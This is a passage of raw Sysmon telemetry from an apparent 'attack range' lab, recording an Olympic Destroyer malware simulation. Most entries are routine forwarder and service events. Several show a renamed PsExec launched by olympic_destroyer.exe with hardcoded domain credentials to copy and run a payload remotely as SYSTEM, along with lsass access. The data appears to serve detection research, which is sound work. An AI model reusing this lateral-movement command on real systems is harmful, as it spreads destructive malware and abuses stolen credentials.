Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE9874BB5AE12D23CC5CDFDE883F80C0,SHA256=A14C1410A9AAD413A6D8C53B25CCB500307DF58734748C387D13E103B46FA29C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:25.708{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51596-false10.0.1.12-8000- 23542300x8000000000000000220619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:27.164{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CFE758013E4B99DC10E5D3B0A18DF2D,SHA256=5315F2212AEA9E149C690AB376B1A08D5E7CF0D6FA1EFF797592D390F525C828,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:25.655{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49366-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:28.599{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1618562396FFC9E75340B41DD21BE7CA,SHA256=1CF0E104FD8A58C631E2BE9105885B9A926E880F8728AC271B97B04996877792,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:28.336{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37F8BD7702EB148C06FEB12CEEC0171B,SHA256=4270B96B09CDACD4CA52CB0B3570F54446DC63A4DD3CAEF092C5AE06CDC81A86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:29.414{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39C89FB1B70249CCA550875249AC4D6E,SHA256=39FD7156C15F87F73D8918DC031078A0EEEBE841F47D1C5349A92BFDEB56F7FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:29.636{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA061754BB42BEAF123AB0804262C638,SHA256=D14746CDD5BE44ACE31DF3D8B000641271D71E592DF9736A082E3DF30D1AF9DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:30.683{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91E3F14016B8E79AB80372C62C17F6E0,SHA256=AA018569BBC3ED6A5F80A0E0262AE051FA2C6DAD5A52B8BEB7502D58AD49981B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:30.602{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28E108B04E1162FE56D68BAFB3DD43E1,SHA256=1FD766B7CC16262D417993218B3727D1C64659BCE1747AE7D311F399CB7F50D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:30.430{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=04F6BC091E90BB8A5DF3910F4A7118D7,SHA256=068FACBE2A0BAE6C5431526ED58DE61FE2027A51E20E7D440240D823B164802D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:30.357{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-155MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:31.835{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89B3608BD305B0EA9EEA84544404B5EA,SHA256=A5ED8C7B4B52672C03784A813089CC46A064743DF1A8B74395546006028F49CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.967{C8EA50B7-F11F-6215-1000-000000003802}3646220C:\Windows\system32\svchost.exe{C8EA50B7-169F-6216-0607-000000003802}5188C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.967{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-169F-6216-0607-000000003802}5188C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.936{C8EA50B7-169F-6216-0607-000000003802}51886480C:\Windows\system32\conhost.exe{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.918{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-169F-6216-0607-000000003802}5188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.898{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-169F-6216-0607-000000003802}5188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.767{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.767{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.767{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.767{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.767{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.767{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.775{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.767{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000296669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.767{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000296668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:31.699{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817BF08EE5E7BCFF8F4F99D84E63369B,SHA256=64A39C683F860D59441086B4F6522248297A70EFD5E2A07FD63D4BCFAE7D4266,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:31.369{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-156MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:32.838{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=213C66C817BFCC7C7E102F56287C488A,SHA256=E3DD29D17D332D50C6048992909B56C9830CDC7E376A3C08A6B1C8B46A4299CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:32.798{C8EA50B7-F11F-6215-1000-000000003802}3645720C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:32.798{C8EA50B7-F11F-6215-1000-000000003802}3645720C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:32.735{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=101C06833177DB43321F3CE358ED8A23,SHA256=2B981FD3B646636AFBCC305B0AC41E58EE0D5B84B3A5A77B827494DA6F2C5FF4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:30.691{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49367-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000296685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:32.052{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:32.052{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000296683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:12:32.036{C8EA50B7-169F-6216-0507-000000003802}2144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000220630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:33.839{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC5F72CF1626343F436077D48C359C0E,SHA256=04306C0FB1C34B3C11C23539BD4C5B1B696BC509954ADF490F9C7BF64FA866D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:33.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3652147E94AECCA8E820EF14A5CFF3D6,SHA256=CC2F8604DCC3950C235C663CAF6B6E39FBC7717928D185C9ABB357722DD7EC2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 